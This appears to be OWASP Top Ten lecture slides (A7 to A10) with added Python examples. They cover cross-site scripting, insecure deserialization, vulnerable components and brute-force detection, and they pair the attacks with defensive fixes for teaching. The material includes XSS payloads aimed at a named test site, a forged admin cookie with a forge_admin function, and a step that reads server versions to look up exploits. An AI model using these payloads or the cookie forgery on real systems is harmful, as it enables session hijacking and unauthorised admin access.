A7 – Cross-Site Scripting
An application takes untrusted data and writes it to a web page without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
http://memeshappen.com/meme/futurama-fry/script-alert-xss-script-60649
A7 – Cross-Site Scripting (reflected)
http://php.testsparker.com/products.php?pro=url"><script>alert("xss")</script>
The parameter value is written into a double-quoted HTML attribute: the leading "> closes the attribute and the tag, and what follows is rendered as page markup.
A7 – Cross-Site Scripting (stored) (five-step diagram: the payload is stored by the application and served to every later visitor)
http://www.acunetix.com/blog/articles/blind-xss/
A7 – Cross-Site Scripting
Impact
• Steal the user's session, steal sensitive data, rewrite the web page, redirect the user to a phishing or malware site
Recommendations
• Output-encode all user-supplied data, using the encoding for the context it is written into (HTML body, attribute, JavaScript, URL)
• Perform allow-list input validation on all user input that will be included in a page
• Use tested and well-known third-party libraries to filter and encode data; a home-made blacklist of <script> is not enough
Hands On! – Cross-Site Scripting Reflected (1)
Starting URL: http://php.testsparker.com/hello.php?name=Visitor
Test 1: http://php.testsparker.com/hello.php?name=Visitor"
Hands On! – Cross-Site Scripting Reflected (2)
Starting URL: http://php.testsparker.com/products.php?pro=url
Test 1: http://php.testsparker.com/products.php?pro=url"><script>alert("xss")</script>
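Added example, not the lab application's PHP: the hello.php?name= page rebuilt in Python three ways (unescaped, with a <script> blacklist, and with context-aware output encoding), and an inspector that parses the rendered page the way a browser would to show what the attacker ends up controlling. The page layout and the two payloads are constructed; the second payload shows why the blacklist fails even though it stops the slide's <script> payload.

```python
import html
from html.parser import HTMLParser


def hello_vulnerable(name: str) -> str:
    """hello.php?name= pattern: the parameter lands in a text node and in a quoted attribute unchanged."""
    return f'<p>Hello {name}</p><input type="text" name="name" value="{name}">'


def strip_script_tags(name: str) -> str:
    """A common but insufficient 'fix': a blacklist on <script>."""
    return name.replace("<script>", "").replace("</script>", "")


def hello_blacklisted(name: str) -> str:
    return hello_vulnerable(strip_script_tags(name))


def hello_encoded(name: str) -> str:
    """Output encoding for the HTML contexts used here: html.escape(quote=True) neutralises
    < > & and both quote characters, so neither context can be broken out of."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello {safe}</p><input type="text" name="name" value="{safe}">'


class _Inspector(HTMLParser):
    """Parses the rendered page and records the parts an attacker could have injected."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.input_attrs = set()

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            self.input_attrs.update(k for k, _ in attrs)


def inspect_page(page: str) -> tuple:
    """Returns (number of <script> elements, attribute names present on the <input>)."""
    inspector = _Inspector()
    inspector.feed(page)
    inspector.close()
    return inspector.script_tags, inspector.input_attrs


# Constructed payloads: the slide's attribute break-out, and one that needs no <script> at all.
PAYLOAD_SCRIPT = '"><script>alert("xss")</script>'
PAYLOAD_EVENT_HANDLER = '" autofocus onfocus="alert(1)'
EXPECTED_INPUT_ATTRS = {"type", "name", "value"}
```

The same value is reflected in two contexts here, and html.escape happens to cover both; a value placed inside a <script> block or a URL would need JavaScript-string or URL encoding instead, which is what "encode for the context" on the recommendation slide means.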
A8 – Insecure Deserialization
The application does not properly secure the serialization/deserialization process and accepts untrusted serialized data. Insecure deserialization can lead to a wide range of attacks: remote command execution, XSS, etc.
A8 – Insecure Deserialization
https://medium.com/blog-blog/insecure-deserialization-e5398e83defe
// JavaScript object
var person = { name: "John", surname: "Doe" };
serialization → {"name":"John","surname":"Doe"} → de-serialization gives the object back
A8 – Insecure Deserialization (diagram: attacks exploit insecure deserialization, also XXE!)
1. POST(john, pass) → the server answers with cookie: eyJqb2huIjoidXNlciJ9
2. base64({"john":"user"}) = eyJqb2huIjoidXNlciJ9, so the cookie is just an unsigned serialized object
3. base64({"john":"admin"}) = eyJqb2huIjoiYWRtaW4ifQ==
4. GET get-admin-panel.php with cookie: eyJqb2huIjoiYWRtaW4ifQ== → 200 OK
A8 – Insecure Deserialization
Impact
• Remote Code Execution, XXE, XSS
Recommendations
• Integrity checks (e.g. a signature over the serialized data): only trusted objects are accepted
• Validate the input
• Use safe functions to deserialize (never a native object deserializer such as PHP unserialize, Java ObjectInputStream or Python pickle on client-supplied data)
• Serialize only a subset of the data, and only trusted data
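Added example, not from the slides: the cookie tampering from the diagram reproduced exactly (the base64 strings are the ones on the slide), next to the "integrity check" recommendation implemented as an HMAC-SHA256 tag over the serialized payload. The secret key and the cookie layout (payload.tag) are assumptions; JSON is used precisely because it is a data format, not an object format, so there is nothing for an attacker to execute.

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"constructed-demo-key-keep-this-server-side"   # assumed server secret


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode()


def cookie_unsigned(claims: dict) -> str:
    """What the slide's application does: base64(JSON), readable and editable by the client."""
    return _b64(json.dumps(claims, separators=(",", ":")).encode())


def is_admin_unsigned(cookie: str) -> bool:
    """The server deserialises whatever it is handed and trusts the result."""
    return json.loads(base64.b64decode(cookie)).get("john") == "admin"


def cookie_signed(claims: dict, key: bytes = SECRET_KEY) -> str:
    """Integrity check: payload.tag, where tag = HMAC-SHA256(key, payload)."""
    payload = _b64(json.dumps(claims, separators=(",", ":")).encode())
    tag = hmac.new(key, payload.encode(), hashlib.sha256).digest()
    return payload + "." + _b64(tag)


def claims_signed(cookie: str, key: bytes = SECRET_KEY) -> dict:
    """Rejects anything whose tag does not verify; compare_digest avoids a timing side channel."""
    payload, _, tag = cookie.partition(".")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(base64.b64decode(tag or ""), expected):
        raise ValueError("cookie integrity check failed")
    return json.loads(base64.b64decode(payload))


def is_admin_signed(cookie: str) -> bool:
    try:
        return claims_signed(cookie).get("john") == "admin"
    except ValueError:
        return False


def forge_admin(cookie: str) -> str:
    """The attack from the slide: swap the payload for base64({"john":"admin"}), keep the rest."""
    _, dot, tag = cookie.partition(".")
    return cookie_unsigned({"john": "admin"}) + dot + tag
```

The tag binds the claims to a key only the server holds, so editing the payload, or re-encoding a payload captured from another user, is detected before anything is deserialised; rotating the key invalidates every cookie issued with the old one, which is sometimes exactly what you want.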
A9 – Using Components with Known Vulnerabilities
The application relies on components (frameworks, libraries, products…) with known vulnerabilities.
• Heartbleed: CVE-2014-0160 (OpenSSL)
• ShellShock: CVE-2014-6271 (Bash)
• GHOST: CVE-2015-0235 (glibc, on Linux)
• DROWN: CVE-2016-0800 (OpenSSL)
• KRACK: several CVE-2017 identifiers (WPA2)
A9 – Using Components with Known Vulnerabilities
https://nvd.nist.gov/vuln-metrics/visualizations/cvss-severity-distribution-over-time
A9 – Using Components with Known Vulnerabilities
Impact
• The full range of weaknesses is possible, including injection, broken access control, XSS…
• The impact could range from minimal to complete host takeover and data compromise
Recommendations
• Perform periodic checks to see if your libraries are out of date or have known vulnerabilities, and keep an inventory of components and versions so that a new CVE can be matched against it quickly
A9 – Using Components with Known Vulnerabilities
https://vulnerability-watch.connettiva.eu/
Hands On! – Vulnerable software
Test: use Burp to read the software versions revealed by the HTTP response headers of http://php.testsparker.com (Server, X-Powered-By), then look up those versions on CVE Details and Exploit-DB for information on their vulnerabilities.
A10 – Insufficient Logging & Monitoring
The application has insufficient logging and monitoring. The activities of users (and therefore of attackers too), especially in the crucial sections of the application, are not logged and/or not analysed.
A10 – Insufficient Logging & Monitoring: brute-force attack (diagram)
• No monitoring: n login attempts in s seconds, with n >> s, go unnoticed and the attack runs to completion
• Monitoring of login attempts: the same n >> s pattern is detected and the source IP is banned
A10 – Insufficient Logging & Monitoring
Impact
• Vulnerability probing goes unnoticed, so an attacker can keep trying until a vulnerability is successfully exploited
• The impact depends on the severity of the vulnerability eventually found
Recommendations
• Implement logging and monitoring, plus proactive actions (alerting, rate limiting, blocking) on what they reveal
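Added example, not from the slides: the "n >> s" rule from the diagram as detection logic over constructed access-log lines for /auth/login.php, with a sliding window per source IP and a ban decision once the threshold is crossed. The log format, the IPs (documentation ranges), the threshold and the window are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed log line format: <ISO timestamp> <client ip> POST /auth/login.php user=<name> status=<code>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d+\.\d+\.\d+\.\d+) POST /auth/login\.php user=(?P<user>\S+) status=(?P<status>\d{3})$"
)

# Constructed sample: 12 failures from one address in 12 seconds, and one ordinary user who
# mistypes a password once and then logs in.
SAMPLE_LOG = sorted(
    [f"2019-11-28T10:00:{s:02d} 203.0.113.5 POST /auth/login.php user=admin status=401" for s in range(12)]
    + [
        "2019-11-28T10:00:05 198.51.100.7 POST /auth/login.php user=alice status=401",
        "2019-11-28T10:00:06 198.51.100.7 POST /auth/login.php user=alice status=200",
    ]
)


def detect_bruteforce(lines, threshold: int = 10, window_seconds: int = 60) -> dict:
    """Sliding-window count of failed logins (401) per source IP.
    Returns {ip: timestamp of the attempt at which the ban decision was taken}."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    banned = {}
    for line in lines:
        match = LINE_RE.match(line)
        if not match or match["status"] != "401":
            continue
        ts = datetime.fromisoformat(match["ts"])
        window = failures[match["ip"]]
        window.append(ts)
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()             # forget failures older than the window
        if len(window) >= threshold and match["ip"] not in banned:
            banned[match["ip"]] = ts     # here the real system would block the IP and alert
    return banned


def failed_attempts_per_ip(lines) -> dict:
    """The metric the slide asks for: how many failed logins each address produced."""
    counts = defaultdict(int)
    for line in lines:
        match = LINE_RE.match(line)
        if match and match["status"] == "401":
            counts[match["ip"]] += 1
    return dict(counts)
```

Counting per source IP is the simplest signal and the one the diagram shows; a distributed attack (many IPs, one account) needs the same window keyed by user name as well, and credential stuffing (many accounts, one attempt each) needs the ratio of failures to successes per IP. Logging only what is needed to detect, not the passwords themselves, keeps this from becoming an A3 problem.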
That's it?
The Top Ten is about the most common vulnerabilities. Others:
• Abuse of functionality
• HTML Injection
• CSRF (Cross-Site Request Forgery)
• SSRF (Server-Side Request Forgery)
• Local & Remote File Inclusion
• Information Leakage
• Frameable Response
• Business logic flaws
• Denial of Service
• …
HTML Injection
A type of injection issue that occurs when a user is able to control an input point and inject arbitrary HTML code into a vulnerable web page. It often results from a partially ineffective protection against Cross-Site Scripting (script is blocked, markup is not).
Abuse of functionality
An attacker manages to use a feature of a web application for malicious purposes.
Typical cases:
• registration forms
• contact request forms
HTML Injection + Abuse of functionality (example slide: attacker-supplied HTML sent out by the application's own email feature)
alfonso.solimeo@cryptonetlabs.it
Theses and activities @ CryptoNet Labs
• Analysis of security issues in cloud environments (AWS, Azure, Google Cloud): pentesting and auditing of cloud environments using techniques and methodologies for finding and exploiting vulnerabilities and insecure configurations.
• Dynamic analysis of applications, based on the Frida framework, on non-rooted Android devices: modifying/patching an Android binary (apk) so that, via Frida, security-sensitive functions and calls can be hooked/intercepted, enabling dynamic/run-time analysis of the application, all on a non-rooted Android device.
• Dynamic analysis of applications written in Swift on non-jailbroken iOS devices: modifying/patching an iOS binary (ipa) written in Swift to hook/intercept security-sensitive functions and calls, enabling dynamic/run-time analysis of the application, all on a non-jailbroken iOS device.
• Static analysis of mobile apps built with the Xamarin framework: reverse engineering, in terms of static analysis, of Android and/or iOS mobile apps written with the cross-platform framework Xamarin, in order to extract information about their (in)security.
• OSINT: reputation analysis of an endpoint and automation of the process: analyse the reputation of an endpoint (IP, domain, email, etc.) using open-source databases, thereby leveraging OSINT technologies, and automate the process.